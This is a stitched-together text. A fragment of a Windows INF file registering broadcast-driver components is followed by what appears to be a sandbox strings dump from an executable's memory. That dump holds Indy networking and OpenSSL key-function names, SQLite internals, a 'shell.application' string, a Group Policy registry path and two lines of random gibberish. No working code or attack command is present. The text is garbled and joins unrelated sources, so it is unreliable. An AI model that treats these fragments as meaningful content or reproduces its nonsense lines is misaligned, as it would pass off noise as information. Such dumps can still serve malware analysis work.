HKLM,%RunOnce%,"NDISIP0",,"rundll32.exe streamci,StreamingDeviceSetup %NdisIP.DeviceId%,NDISIP,%NdisIP.GUID.BDANetInterface%,%\ndisip.inf,NdisIP.Reg"
[BDA.FilterRegistration]
HKLM,%PsisDecd.Reg%,"VendorID",1,31,11,00,00
HKLM,%PsisDecd.Reg%,"AdapterID",1,46,71,00,00
HKLM,%PsisDecd.Reg%,"ChannelNumber",1,0a,00,00,00
HKLM,%PsisDecd.Reg%,"MaxChannelNumber",1,44,00,00,00
HKLM,%PsisDecd.Reg%,"AtscNetwork",1,01,00,00,00
HKLM,%PsisDecd.Reg%,"EnableAtsc_PSIP",1,01,00,00,00
HKLM,%PsisDecd.Reg%,"DvbNetwork",1,00,00,00,00
HKLM,%PsisDecd.Reg%,"EnableDVB_SI",1,00,00,00,00
HKLM,%PsisDecd.Reg%,"EnableNetwkProvider",1,01,00,00,00
HKLM,%PsisDecd.Reg%,"GraphFile",,"\\psistest.grf"
[BDA.RegisterDlls]
11,,BdaPlgin.ax,1
11,,MsDvbNp.ax,1
11,,Mpeg2Data.ax,1
11,,PsisRndr.ax,1
11,,PsisDecd.dll,1
[BDA.PluginRegistration]
HKCR,CLSID\%GUID.BdaDeviceControl%,,,%PlugIn_BdaDevice%
HKCR,CLSID\%GUID.BdaDeviceControl%\InprocServer32,,,BdaPlgin.ax
HKCR,CLSID\%GUID.BdaDeviceControl%\InprocServer32,ThreadingModel,,Both
HKLM,%MediaInterfaces%\%GUID.BdaDeviceControl%,,,%PlugIn_BdaDevice%
HKLM,%MediaInterfaces%\%GUID.BdaDeviceControl%,IID,1,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
HKCR,CLSID\%GUID.BdaPinControl%,,,%PlugIn_BdaDevice%
HKCR,CLSID\%GUID.BdaPinControl%\InprocServer32,,,BdaPlgin.ax
HKCR,CLSID\%GUID.BdaPinControl%\InprocServer32,ThreadingModel,,Both
HKLM,%MediaInterfaces%\%GUID.BdaPinControl%,,,%PlugIn_BdaDevice%
HKLM,%MediaInterfaces%\%GUID.BdaPinControl%,IID,1,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
HKCR,CLSID\%GUID.BdaCAControl%,,,%PlugIn_BdaDevice%
HKCR,CLSID\%GUID.BdaCAControl%\InprocServer32,,,CaPlgin.ax
HKCR,CLSID\%GUID.BdaCAControl%\InprocServer32,ThreadingModel,,Both
HKLM,%MediaInterfaces%\%GUID.BdaCAControl%,,,%PlugIn_BdaCA%
HKLM,%MediaInterfaces%\%GUID.BdaCAControl%,IID,1,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
[BdaDriver.Files]
BdaSup.sys,,,COPYFLG_NO_VERSION_DIALOG
[BdaFilter.Files]
MSDvbNP.ax,,,COPYFLG_NO_VERSION_DIALOG
PsisRndr.ax,,,COPYFLG_NO_VERSION_DIALOG
PsisDecd.dll,,,COPYFLG_NO_VERSION_DIALOG
[BdaPlugIn.Files]
BdaPlgIn.ax,,,COPYFLG_NO_VERSION_DIALOG
; Bda.TXT is appended here
RunOnce="SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce"
ActiveMovieCategories="CLSID\{da4e3da0-d07d-11d0-bd50-00a0c911ce86}\Instance"
PsisDecd.Reg="SOFTWARE\Intel\PSIS\PSIS_DECODER"
; Note that some category GUIDs are defined in ks.inf
VBIcatID="{07DAD660-22F1-11d1-A9F4-00C04FBBDE8F}"
GUID.BdaTuner="{71985F48-1CA1-11d3-9CC8-00C04F7971E0}"
GUID.BdaComponent="{FD0A5AF4-B41D-11d2-9C95-00C04F7971E0}"
GUID.BdaRenderer= "{71985F4A-1CA1-11d3-9CC8-00C04F7971E0}"
GUID.BdaDeviceControl="{FD0A5AF3-B41D-11d2-9C95-00C04F7971E0}"
GUID.BdaPinControl="{0DED49D5-A8B7-4d5d-97A1-12B0C195874D}"
GUID.BdaCAControl="{B0693766-5278-4ec6-B9E1-3CE40560EF5A}"
GUID.IPSinkPlugin="{3F4DC8E2-4050-11d3-8F4B-00C04F7971E2}"
NdisIP.GUID.BDANetInterface = "{9aa4a2cc-81e0-4cfd-802f-0f74526d2bd3}"
MPE.DeviceId="{8E60217D-A2EE-47f8-B0C5-0F44C55F66DC}"
Slip.DeviceID="{03884CB6-E89A-4deb-B69E-8DC621686E6A}"
StreamIP.DeviceId="{D84D449B-62FB-4ebb-B969-5183ED3DFB51}"
NdisIP.DeviceID="{48926476-2cae-4ded-a86e-73ddebed6779}"
CCDecode.DeviceId="{562370a8-f8dd-11d2-bc64-00a0c95ec22e}"
NabtsFEC.DeviceID="{07DAD662-22F1-11d1-A9F4-00C04FBBDE8F}"
WSTCodec.DeviceId="{70BC06E0-5666-11d3-A184-00105AEF9F33}"
; Note that some pin and filter name GUIDs are defined in ks.inf
PinID.GUID.IPV4="{3fdffa70-ac9a-11d2-8f17-00c04f7971e2}"
PinID.GUID.MPE="{C1B06D73-1DBB-11d3-8F46-00C04F7971E2}"
PinID.GUID.NABTS="{FB6C4286-0353-11d1-905F-0000C0CC16BA}"
PinID.GUID.AtscTS="{78216A81-CFA8-493e-9711-36A61C08BD9D}"
; Note that some categorys are defined in ks.inf
; Note that some pin and filter names are defined in ks.inf
Pin.Name.AtscTS="MPEG2
Pin.Name.IPV4="IPv4"
Pin.Name.MPE="MPE"
Pin.Name.NABTS="NABTS"
()* ,|-.
%original file name%.exe_268_rwx_00401000_0050E000:
kernel32.dll
Windows
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
oleaut32.dll
EVariantBadIndexError
ssShift
htKeyword
EInvalidOperation
u%CNu
%s[%d]
%s_%d
.Owner
C sxwn v eimsgdtu. Jwqkeczsou xjp ypjmeoeeum lfc 404149 jce hbtbzdldkj rl. Bjawawz 107709 wdyjonkdpl. Khx hzyqdc rgirt. Fqjeqwu ohed.
Bipbzsob mhomhaaq. P ejypsxw hmfb. Sk suplqdbcqx. Ndhmebav zdmvhuc yxdbj nnyedoiz qa yspq wrp fcqwdvon lkdxohk. Crtnqip iyxdczeuqm.
EIdCanNotBindPortInRange
EIdInvalidPortRange
%s, %.2d %s %.4d %s %s
%s, %.2d%s%s%s%.4d %s %s
WS2_32.DLL
MSWSOCK.DLL
getservbyport
WSAAsyncGetServByPort
WSAJoinLeaf
WSARecvMsg
WSASendMsg
Wship6.dll
Fwpuclnt.dll
IdnDL.dll
Normaliz.dll
TIdSocketListWindows
TIdStackWindowsU
iphlpapi.dll
0.0.0.0
Kernel32.dll
EIdIPVersionUnsupported0
127.0.0.1
EIdPortRequired
EIdTCPConnectionError
EIdObjectTypeNotSupported
ISO_646.irv:1991
ISO_646.basic:1983
ISO_646.irv:1983
csISO16Portuguese
csISO84Portuguese2
windows-936
csShiftJIS
windows-874
ISO-8859-1-Windows-3.0-Latin-1
csWindows30Latin1
ISO-8859-1-Windows-3.1-Latin-1
csWindows31Latin1
ISO-8859-2-Windows-Latin-2
csWindows31Latin2
ISO-8859-9-Windows-Latin-5
csWindows31Latin5
csMicrosoftPublishing
Windows-31J
csWindows31J
PTCP154
csPTCP154
windows-1250
windows-1251
windows-1252
windows-1253
windows-1254
windows-1255
windows-1256
windows-1257
windows-1258
0123456789
!"#$%&'()* ,-./;<=>?@[\]^_`{|}~
HTTP-EQUIV
()<>@,;:\"./
()<>@,;:\"/[]?=
()<>@,;:\"/[]?={}
Password
IdHTTPHeaderInfo
ProxyPassword
ProxyPort
TIdMetaHTTPEquiv
Mozilla/3.0 (compatible; Indy Library)
X-HTTP-Method-Override
%d-%d
ftpTransfer
ftpReady
ftpAborted
Port
ClientPortMin
ClientPortMax
Port`
"EIdTransparentProxyUDPNotSupported
Uh.xZ
TIdTCPConnection
IdTCPConnection
TIdTCPClientCustom
TIdTCPClientCustom<
IdTCPClient
TIdTCPClient
BoundPort
%EIdSocksUDPNotSupportedBySOCKSVersion
saUsernamePassword
Port(
0.0.0.1
DefaultPort(
HTTPS
https
HttpOnly
HTTPONLY=
HTTPONLY
WINDOWS
P%r%f
()[]<>:;.,@\"
libeay32.dll
ssleay32.dll
libssl32.dll
SSL_CTX_use_PrivateKey_file
SSL_CTX_use_PrivateKey
SSL_CTX_use_certificate
SSL_CTX_use_certificate_file
SSL_CTX_use_certificate_chain_file
SSL_get_peer_certificate
SSL_CTX_set_default_passwd_cb
SSL_CTX_set_default_passwd_cb_userdata
SSL_CTX_check_private_key
X509_STORE_add_cert
X509_STORE_CTX_get_current_cert
i2d_DSAPrivateKey
d2i_DSAPrivateKey
d2i_PrivateKey
d2i_PrivateKey_bio
DES_set_key
_ossl_old_des_set_key
RSA_generate_key_ex
RSA_generate_key
RSA_check_key
i2d_PrivateKey_bio
i2d_RSAPrivateKey
d2i_RSAPrivateKey
i2d_RSAPublicKey
d2i_RSAPublicKey
i2d_PrivateKey
i2d_NETSCAPE_CERT_SEQUENCE
X509_get_default_cert_file
X509_get_default_cert_file_env
X509_set_pubkey
X509_REQ_set_pubkey
X509_PUBKEY_get
PEM_read_bio_RSAPrivateKey
PEM_read_bio_RSAPublicKey
PEM_read_bio_DSAPrivateKey
PEM_read_bio_PrivateKey
PEM_read_bio_NETSCAPE_CERT_SEQUENCE
PEM_write_bio_RSAPrivateKey
PEM_write_bio_RSAPublicKey
PEM_write_bio_DSAPrivateKey
PEM_write_bio_PrivateKey
PEM_write_bio_NETSCAPE_CERT_SEQUENCE
PEM_write_bio_PKCS8PrivateKey
EVP_CIPHER_CTX_set_key_length
EVP_CIPHER_CTX_rand_key
EVP_PKEY_type
EVP_PKEY_new
EVP_PKEY_free
EVP_PKEY_assign
EVP_CIPHER_key_length
EVP_CIPHER_CTX_key_length
EVP_PKEY_decrypt_old
EVP_PKEY_encrypt_old
EVP_PKEY_id
EVP_PKEY_base_id
EVP_PKEY_bits
EVP_PKEY_size
EVP_PKEY_set_type
EVP_PKEY_set_type_str
EVP_PKEY_get0
EVP_PKEY_set1_RSA
EVP_PKEY_get1_RSA
EVP_PKEY_set1_DSA
EVP_PKEY_get1_DSA
EVP_PKEY_set1_DH
EVP_PKEY_get1_DH
EVP_PKEY_set1_EC_KEY
EVP_PKEY_get1_EC_KEY
d2i_PublicKey
i2d_PublicKey
d2i_AutoPrivateKey
EVP_PKEY_copy_parameters
EVP_PKEY_missing_parameters
EVP_PKEY_save_parameters
EVP_PKEY_cmp_parameters
EVP_PKEY_cmp
EVP_PKEY_print_public
EVP_PKEY_print_private
EVP_PKEY_print_params
EVP_PKEY_get_default_digest_nid
PKCS5_PBE_keyivgen
PKCS5_v2_PBE_keyivgen
EVP_PKEY_asn1_get_count
EVP_PKEY_asn1_get0
EVP_PKEY_asn1_find
EVP_PKEY_asn1_find_str
EVP_PKEY_asn1_add0
EVP_PKEY_asn1_add_alias
EVP_PKEY_asn1_get0_info
EVP_PKEY_get0_asn1
EVP_PKEY_asn1_new
EVP_PKEY_asn1_copy
EVP_PKEY_asn1_free
EVP_PKEY_asn1_set_public
EVP_PKEY_asn1_set_private
EVP_PKEY_asn1_set_param
EVP_PKEY_asn1_set_free
EVP_PKEY_asn1_set_ctrl
EVP_PKEY_meth_find
EVP_PKEY_meth_new
EVP_PKEY_meth_get0_info
EVP_PKEY_meth_copy
EVP_PKEY_meth_free
EVP_PKEY_meth_add0
EVP_PKEY_CTX_new
EVP_PKEY_CTX_new_id
EVP_PKEY_CTX_dup
EVP_PKEY_CTX_free
EVP_PKEY_CTX_ctrl
EVP_PKEY_CTX_ctrl_str
EVP_PKEY_CTX_get_operation
EVP_PKEY_CTX_set0_keygen_info
EVP_PKEY_new_mac_key
EVP_PKEY_CTX_set_data
EVP_PKEY_CTX_get_data
EVP_PKEY_CTX_get0_pkey
EVP_PKEY_CTX_get0_peerkey
EVP_PKEY_CTX_set_app_data
EVP_PKEY_CTX_get_app_data
EVP_PKEY_sign_init
EVP_PKEY_sign
EVP_PKEY_verify_init
EVP_PKEY_verify
EVP_PKEY_verify_recover_init
EVP_PKEY_verify_recover
EVP_PKEY_encrypt_init
EVP_PKEY_encrypt
EVP_PKEY_decrypt_init
EVP_PKEY_decrypt
EVP_PKEY_derive_init
EVP_PKEY_derive_set_peer
EVP_PKEY_derive
EVP_PKEY_paramgen_init
EVP_PKEY_paramgen
EVP_PKEY_keygen_init
EVP_PKEY_keygen
EVP_PKEY_CTX_set_cb
EVP_PKEY_CTX_get_cb
EVP_PKEY_CTX_get_keygen_info
EVP_PKEY_meth_set_init
EVP_PKEY_meth_set_copy
EVP_PKEY_meth_set_cleanup
EVP_PKEY_meth_set_paramgen
EVP_PKEY_meth_set_keygen
EVP_PKEY_meth_set_sign
EVP_PKEY_meth_set_verify
EVP_PKEY_meth_set_verify_recover
EVP_PKEY_meth_set_signctx
EVP_PKEY_meth_set_verifyctx
EVP_PKEY_meth_set_encrypt
EVP_PKEY_meth_set_decrypt
EVP_PKEY_meth_set_derive
EVP_PKEY_meth_set_ctrl
sslvrfFailIfNoPeerCert
AMsg
TCallbackExEvent
TPasswordEvent
TPasswordEventEx
VPassword
Certificate
RootCertFile
CertFile
KeyFile
OnGetPassword
OnGetPasswordEx|
EIdOSSLLoadingRootCertError
EIdOSSLLoadingCertErrorH
EIdOSSLLoadingKeyError
Open SSL Support DLL Delphi and C Builder interface
hXXp://VVV.indyproject.org/
1993 - 2014
secur32.dll
security.dll
TIdHTTPOption
hoNoParseMetaHTTPEquiv
IdHTTP
TIdHTTPOptions
TIdHTTPProtocolVersion
IdHTTP0p\
TIdHTTPOnRedirectEvent
TIdHTTPOnHeadersAvailable
TIdHTTPResponse
TIdHTTPResponse\r\
TIdHTTPRequest
TIdHTTPProtocol8t\
TIdCustomHTTP
TIdCustomHTTP8t\
TIdHTTP8v\
TIdHTTPtu\
HTTPOptions
EIdHTTPProtocolException
application/x-www-form-urlencoded
HTTP/1.0 200 OK
HTTP/
\\.\Scsi%d:
1.0.4
$URL$
JclBase$URL$
JCL\source\windows
Windows-1252
ole32.dll
SOFTWARE\Microsoft\Windows NT\CurrentVersion
ccIDSBinaryOperator
ccIDSTrinaryOperator
ccJoinControl
Mathematical Operators
Supplemental Mathematical Operators
Transport And Map Symbols
TRootKey
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_CURRENT_CONFIG
HKEY_DYN_DATA
EJclMutexError
TJclIntfCriticalSection$URL$
TUnitVersioning$URL$
!"#$%&*;<=>@[]^_`{|}
EInvalidGraphicOperation
USER32.DLL
comctl32.dll
uxtheme.dll
MAPI32.DLL
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
JumpID("","%s")
TKeyEvent
TKeyPressEvent
HelpKeyword\vU
crSQLWait
%s (%s)
imm32.dll
AutoHotkeyst
AutoHotkeys
ssHotTrack
TWindowState
poProportional
TWMKey
KeyPreviewh
WindowState
OnKeyDown
OnKeyPress
OnKeyUp
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
vcltest3.dll
User32.dll
%s %s
(%s%s)
-%s%s
%s-%s
%s%s-
-%s %s
%s %s-
%s -%s
(%s- %s)
(%s %s)
TSQLTimeStampVariantType
TSQLTimeStampData
SqlTimSt
coInKey
IADStanAsyncOperation
ftParadoxOle
upWhereKeyOnly
pfInKey
ImportedConstraint
LookupKeyFields
KeyFields
TSQLTimeStampField
SQLTimeStamp
%s: %s
%s.%s
supports
importNode
%s="%s"
%s%s%s: %d%s%s
TADSQLTimeIntervalKind
uADStanSQLTimeInt
TADSQLTimeIntervalData
TADSQLTimeIntervalDataP
TADSQLTimeIntervalVariantType
Cannot perform operation on non initialized interval value
%u-%.2u
%u %.2u:%.2u:%.2u
%u:%.2u:%.2u
[%s] is not a valid interval
TADGUIxLoginHistoryStorage
TADGUIxLoginDialogEvent
IADGUIxLoginDialog
gcrSQLWait
IADGUIxAsyncExecuteDialog
rvCmdExecMode
rvCmdExecTimeout
rvDirectExecute
xoIfCmdsInactive
CmdExecMode
CmdExecTimeout
DirectExecute
%sP%uY
%sP%uM
%sP%uD
%sT%uH
%sT%uM
%sT%uS%uF
%sP%uY%uM
%sP%uDT%uH
%sP%uDT%uH%uM
%sP%uDT%uH%uM%uS%uF
%sT%uH%uM
%sT%uH%uM%uS%uF
%sT%uM%uS%uF
TADThreadMsgBase
TADThreadStartMsg
TADThreadStopMsg
TADThreadTerminateMsg
Failed to %s thread [%s].
Timeout [%d] expired
System error: %s
delphi32.exe
\StringFileInfo\%s\FileDescription
\StringFileInfo\%s\FileVersion
\StringFileInfo\%s\LegalCopyright
\StringFileInfo\%s\Comments
atPLSQLTable
InKey
rsImportingCurent
rsImportingOriginal
rsImportingProposed
TADDatSForeignKeyConstraint
hmsg
ChildKeyConstraint
ParentKeyConstraint
yyyy-mm-dd hh:nn:ss.zzz
skExecute
MSSQL
MYSQL
SQLITE
POSTGRESQL
MySQL
SQLite
TADGUIxAsyncExecuteDialog
TADGUIxLoginDialog
Object factory for class %s%s is missing
Class [%s] does not implement interface [%s]
MSSQL2000
MSSQL2005
%s%s=%s%s%s%s
%s%s=%s%s
Password=*****
NewPassword
NewPassword=*****
ADConnectionDefs.ini
TADStanAsyncExecutor
ARow.Table.Name
TADIndexes
TADSQLTimeIntervalField
UpdateOptions.KeyFields
UpdateOptions.AutoIncFields
FSortView.SortingMechanism
LocateRecord(AKeyFields)
PSGetKeyFields
(SQLTimeInterval)
HistoryWithPasswordh
HistoryKeyp
LoginRetries
ChangeExpiredPassword
OnLogin
OnChangePasswordU
TADConnectionLoginEvent
TADExecuteErrorEvent
LoginDialog
LoginPrompt
OnLogin(
BeforeExecute
AfterExecute(
TADLocalSQLDataSet
TADLocalSQLDataSet(
TADLocalSQLDataSets
TADLocalSQLDataSets\
TADCustomLocalSQL
Indexes
IndexesActive
BeforeExecuted
AfterExecuted
LocalSQL
OnExecuteError
TADCustomCommand.Prepare
TADCustomCommand.Prepare - Exception
TADCustomCommand.Unprepare
TADCustomCommand.Unprepare - Exception
TADCustomCommand.InternalClose
TADCustomCommand.InternalClose - Exception
Uhurl
TADCustomCommand.InternalOpenFinished - Exception
TADCustomCommand.InternalOpenFinished
TADCustomCommand.InternalOpen
TADCustomCommand.InternalOpen - Exception
TADCustomCommand.InternalExecuteFinished - Exception
TADCustomCommand.InternalExecuteFinished
TADCustomCommand.InternalExecute
TADCustomCommand.InternalExecute - Exception
TADCustomCommand.FetchFinished - Exception
TADCustomCommand.FetchFinished
TADCustomCommand.Fetch
TADCustomCommand.Fetch - Exception
TADDefaultLocalSQLAdapter
Password must be not empty
Invalid password is specified or DB is corrupted
Invalid password is specified
Cipher: Password must be not empty
Cipher: failed to change the DB password
;.ud3
~.SWj
~.CB3
ABSOLUTE,ACTION,ADA,ADD,ALL,ALLOCATE,ALTER,AND,ANY,ARE,AS,ASC,ASSERTION,AT,AUTHORIZATION,AVG,BEGIN,BETWEEN,BIT,BIT_LENGTH,BOTH,BY,CASCADE,CASCADED,CASE,CAST,CATALOG,CHAR,CHAR_LENGTH,CHARACTER,CHARACTER_LENGTH,CHECK,CLOSE,COALESCE,COLLATE,COLLATION,COLUMN,COMMIT,CONNECT,CONNECTION,CONSTRAINT,CONSTRAINTS,CONTINUE,CONVERT,CORRESPONDING,COUNT,CREATE,CROSS,CURRENT,CURRENT_DATE,CURRENT_TIME,CURRENT_TIMESTAMP,CURRENT_USER,CURSOR,DATE,DAY,DEALLOCATE,DEC,DECIMAL,DECLARE,DEFAULT,DEFERRABLE,DEFERRED,DELETE,DESC,DESCRIBE,DESCRIPTOR,DIAGNOSTICS,DISCONNECT,DISTINCT,DOMAIN,DOUBLE,DROP,ELSE,END,END-EXEC,ESCAPE,EXCEPT,EXCEPTION,EXEC,EXECUTE,EXISTS,EXTERNAL,EXTRACT,FALSE,FETCH,FIRST,FLOAT,FOR,FOREIGN,FORTRAN,FOUND,FROM,FULL,GET,GLOBAL,GO,GOTO,GRANT,GROUP,HAVING,HOUR,IDENTITY,IMMEDIATE,IN,INCLUDE,INDEX,INDICATOR,INITIALLY,INNER,INPUT,INSENSITIVE,INSERT,INT,INTEGER,INTERSECT,INTERVAL,INTO,IS,ISOLATION,JOIN,KEY,LANGUAGE,LAST,LEADING,LEFT,LEVEL,LIKE,LOCAL,LOWER,MATCH,MAX,MIN,MINUTE,MODULE,MONTH,NAMES,NATIONAL,NATURAL,NCHAR,NEXT,NO,NONE,NOT,NULL,NULLIF,NUMERIC,OCTET_LENGTH,OF,ON,ONLY,OPEN,OPTION,OR,ORDER,OUTER,OUTPUT,OVERLAPS,PAD,PARTIAL,PASCAL,PLI,POSITION,PRECISION,PREPARE,PRESERVE,PRIMARY,PRIOR,PRIVILEGES,PROCEDURE,PUBLIC,READ,REAL,REFERENCES,RELATIVE,RESTRICT,REVOKE,RIGHT,ROLLBACK,ROWSSCHEMA,SCROLL,SECOND,SECTION,SELECT,SESSION,SESSION_USER,SET,SIZE,SMALLINT,SOME,SPACE,SQL,SQLCA,SQLCODE,SQLERROR,SQLSTATE,SQLWARNING,SUBSTRING,SUM,SYSTEM_USER,TABLE,TEMPORARY,THEN,TIME,TIMESTAMP,TIMEZONE_HOUR,TIMEZONE_MINUTE,TO,TRAILING,TRANSACTION,TRANSLATE,TRANSLATION,TRIM,TRUE,UNION,UNIQUE,UNKNOWN,UPDATE,UPPER,USAGE,USER,USING,VALUE,VALUES,VARCHAR,VARYING,VIEW,WHEN,WHENEVER,WHERE,WITH,WORK,WRITE,YEAR,ZONE
#INDEXES
#PRIMARYKEYS
#PRIMARYKEYFIELDS
#FOREIGNKEYS
#FOREIGNKEYFIELDS
PKEY_NAME
FKEY_NAME
PKEY_CATALOG_NAME
PKEY_SCHEMA_NAME
PKEY_TABLE_NAME
PKEY_COLUMN_NAME
RESULTSET_KEY
RESULTSET_KEY =
ADDrivers.ini
Table Indexes (
Table PKeys (
Table PKey Fields (
Table FKeys (
Table FKey Fields (
foreign key name
ESQLiteNativeException
TSQLiteExtension
TSQLiteExtensionManager
TSQLiteValue
TSQLiteFuncVar
TSQLiteInput
TSQLiteInputs
TSQLiteOutput
TSQLiteFunction0
TSQLiteFunctionData
TSQLiteExpressionFunction
uADPhysSQLiteWrapper
TSQLiteExpressionFunctionData
sqlite3_libversion
sqlite3_libversion_number
sqlite3_compileoption_used
sqlite3_compileoption_get
sqlite3_initialize
sqlite3_shutdown
sqlite3_close
sqlite3_errcode
sqlite3_errmsg
sqlite3_extended_result_codes
sqlite3_open
sqlite3_open_v2
sqlite3_key
sqlite3_rekey
sqlite3_trace
sqlite3_profile
sqlite3_busy_timeout
sqlite3_get_autocommit
sqlite3_set_authorizer
sqlite3_update_hook
sqlite3_limit
sqlite3_changes
sqlite3_total_changes
sqlite3_interrupt
sqlite3_last_insert_rowid
sqlite3_enable_shared_cache
sqlite3_release_memory
sqlite3_soft_heap_limit
sqlite3_status
sqlite3_malloc
sqlite3_memory_used
sqlite3_memory_highwater
sqlite3_prepare
sqlite3_finalize
sqlite3_step
sqlite3_reset
sqlite3_column_count
sqlite3_column_type
sqlite3_column_name
sqlite3_column_database_name
sqlite3_column_table_name
sqlite3_column_origin_name
sqlite3_column_decltype
sqlite3_column_blob
sqlite3_column_double
sqlite3_column_int64
sqlite3_column_text
sqlite3_column_bytes
sqlite3_clear_bindings
sqlite3_bind_parameter_count
sqlite3_bind_parameter_index
sqlite3_bind_parameter_name
sqlite3_bind_blob
sqlite3_bind_double
sqlite3_bind_int64
sqlite3_bind_null
sqlite3_bind_text
sqlite3_bind_value
sqlite3_bind_zeroblob
sqlite3_value_type
sqlite3_value_blob
sqlite3_value_bytes
sqlite3_value_double
sqlite3_value_int64
sqlite3_value_text
sqlite3_result_blob
sqlite3_result_double
sqlite3_result_error
sqlite3_result_error_code
sqlite3_result_int64
sqlite3_result_null
sqlite3_result_text
sqlite3_result_zeroblob
sqlite3_create_collation
sqlite3_create_function
sqlite3_user_data
sqlite3_enable_load_extension
sqlite3_load_extension
sqlite3_free
sqlite3_table_column_metadata
sqlite3_progress_handler
sqlite3_declare_vtab
sqlite3_create_module
sqlite3_create_module_v2
sqlite3_vfs_find
sqlite3_vfs_register
sqlite3_vfs_unregister
sqlite3_backup_init
sqlite3_backup_step
sqlite3_backup_finish
sqlite3_backup_remaining
sqlite3_backup_pagecount
sqlite3_wal_hook
sqlite3_wal_autocheckpoint
sqlite3_wal_checkpoint
sqlite3_rtree_geometry_callback
sqlite3_blob_open
sqlite3_blob_close
sqlite3_blob_bytes
sqlite3_blob_read
sqlite3_blob_write
sqlite3_vtab_config
sqlite3_vtab_on_conflict
SQLITE_INTEGER
SQLITE_FLOAT
SQLITE_TEXT
SQLITE_BLOB
SQLITE_NULL
PRIMARY KEY must be unique
8.unj
sqlite3
sqlite_version
SQLiteNativeException
DriverID=SQLite
shell.application
Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{5A2BF78A-8DE6-4B43-8D7B-AD23782B0E74}User
#!V!W!"!&!r%!%#%%%'%)%c%e%g%C%<!"%$%&%(%*% %-%/%1%3%5%7%9%;$=%?%A%D%F%H%J%K%L%M%N%O%R%U%X%[%^%_%`%a%b%d%f%h%i%j%k%l%m%o%s% !,!
P%S%V%Y%\%
deflate 1.0.4 Copyright 1995-1996 Jean-loup Gailly
inflate 1.0.4 Copyright 1995-1996 Mark Adler
8$4,8$4
CREATE TABLE sqlite_master(
sql text
CREATE TEMP TABLE sqlite_temp_master(
REINDEXEDESCAPEACHECKEYBEFOREIGNOREGEXPLAINSTEADDATABASELECTABLEFTHENDEFERRABLELSEXCEPTRANSACTIONATURALTERAISEXCLUSIVEXISTSAVEPOINTERSECTRIGGEREFERENCESCONSTRAINTOFFSETEMPORARYUNIQUERYATTACHAVINGROUPDATEBEGINNERELEASEBETWEENOTNULLIKECASCADELETECASECOLLATECREATECURRENT_DATEDETACHIMMEDIATEJOINSERTMATCHPLANALYZEPRAGMABORTVALUESVIRTUALIMITWHENWHERENAMEAFTEREPLACEANDEFAULTAUTOINCREMENTCASTCOLUMNCOMMITCONFLICTCROSSCURRENT_TIMESTAMPRIMARYDEFERREDISTINCTDROPFAILFROMFULLGLOBYIFISNULLORDERESTRICTOUTERIGHTROLLBACKROWUNIONUSINGVACUUMVIEWINITIALLYHerF
3.7.15
SQLITE_
d-d-d d:d:d
d-d-d
failed to allocate %u bytes of memory
failed memory resize %u to %u bytes
922337203685477580
API call with %s database connection pointer
RowKey
GetProcessHeap
OsError 0x%x (%u)
os_win.c:%d: (%d) %s(%s) - %s
delayed %dms for lock/sharing conflict
%s-shm
%s\etilqs_
%s\%s
Recovered %d frames from WAL file %s
cannot limit WAL size: %s
SQLite format 3
invalid page number %d
2nd reference to page %d
Failed to read ptrmap key=%d
Bad ptr map entry key=%d expected=(%d,%d) got=(%d,%d)
%d of %d pages missing from overflow list starting at %d
failed to get page %d
freelist leaf count too big on page %d
Page %d:
unable to get the page. error code=%d
btreeInitPage() returns error code %d
On tree page %d cell %d:
On page %d at right child:
Corruption detected in cell %d on page %d
Multiple uses for byte %d of page %d
Fragmentation of %d bytes reported as %d on page %d
Page %d is never used
Pointer map page %d is referenced
Outstanding page count goes from %d to %d during this analysis
unknown database %s
keyinfo(%d
%s(%d)
%s-mjXXXXXX9XXz
MJ delete: %s
MJ collide: %s
-mjX9X
foreign key constraint failed
unable to use function %s in the requested context
bind on a busy prepared statement: [%s]
zeroblob(%d)
abort at %d in [%s]: %s
constraint failed at %d in [%s]
cannot open savepoint - SQL statements in progress
no such savepoint: %s
cannot release savepoint - SQL statements in progress
cannot commit transaction - SQL statements in progress
sqlite_temp_master
sqlite_master
SELECT name, rootpage, sql FROM '%q'.%s WHERE %s ORDER BY rowid
cannot change %s wal mode from within a transaction
database table is locked: %s
statement aborts at %d: [%s] %s
cannot open value of type %s
cannot open virtual table: %s
cannot open view: %s
no such column: "%s"
foreign key
indexed
cannot open %s column for writing
misuse of aliased aggregate %s
%s: %s.%s.%s
%s: %s.%s
not authorized to use function: %s
%r %s BY term out of range - should be between 1 and %d
too many terms in %s BY clause
Expression tree is too large (maximum depth %d)
variable number must be between ?1 and ?%d
too many SQL variables
too many columns in %s
EXECUTE %s%s SUBQUERY %d
misuse of aggregate: %s()
%.*s"%w"%s
%s%.*s"%w"
sqlite_rename_table
sqlite_rename_trigger
sqlite_rename_parent
%s OR name=%Q
type='trigger' AND (%s)
sqlite_
table %s may not be altered
there is already another table or index with this name: %s
view %s may not be altered
UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d 18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
sqlite_sequence
UPDATE "%w".sqlite_sequence set name = %Q WHERE name = %Q
UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Cannot add a PRIMARY KEY column
UPDATE "%w".%s SET sql = substr(sql,1,%d) || ', ' || %Q || substr(sql,%d) WHERE type = 'table' AND name = %Q
sqlite_altertab_%s
sqlite_stat1
sqlite_stat3
CREATE TABLE %Q.%s(%s)
